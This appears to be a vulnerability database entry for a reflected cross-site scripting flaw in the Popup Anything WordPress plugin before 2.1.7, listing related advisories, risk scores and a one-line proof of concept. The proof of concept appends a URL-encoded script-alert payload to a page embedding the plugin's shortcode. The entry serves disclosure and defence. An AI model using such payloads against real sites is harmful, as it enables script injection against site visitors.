Lucene search
K

Popup Anything < 2.1.7 - Reflected Cross-Site Scripting

🗓️ 04 Jul 2022 00:00:00Reported by ZhongFu Su(JrXnm) of WuHan UniversityType 
wpexploit
 wpexploit
👁 158 Views

Popup Anything < 2.1.7 - Reflected Cross-Site Scripting vulnerability in [paoc_details display="key_xxx"] shortcod

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-2115
25 Jul 202213:15
attackerkb
Circl
CVE-2022-2115
25 Jul 202216:32
circl
CNNVD
WordPress plugin Popup Anything 跨站脚本漏洞
25 Jul 202200:00
cnnvd
CVE
CVE-2022-2115
25 Jul 202212:46
cve
Cvelist
CVE-2022-2115 Popup Anything < 2.1.7 - Reflected Cross-Site Scripting
25 Jul 202212:46
cvelist
EUVD
EUVD-2022-34401
3 Oct 202520:07
euvd
NVD
CVE-2022-2115
25 Jul 202213:15
nvd
OSV
CVE-2022-2115
25 Jul 202213:15
osv
Patchstack
WordPress Popup Anything plugin <= 2.1.6 - Reflected Cross-Site Scripting (XSS) vulnerability
4 Jul 202200:00
patchstack
Prion
Cross site scripting
25 Jul 202213:15
prion
Rows per page
On a post/page where the [paoc_details display="key_xxx"] shortcode is embed, append the following payload: ?xxx=11111%3Cscript%3Ealert(/XSS/)%3C/script%3E

e.g: https://example.com/2022/06/10/hello/?xxx=11111%3Cscript%3Ealert(/XSS/)%3C/script%3E

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Sep 2022 10:03Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.16.1
EPSS0.0055
158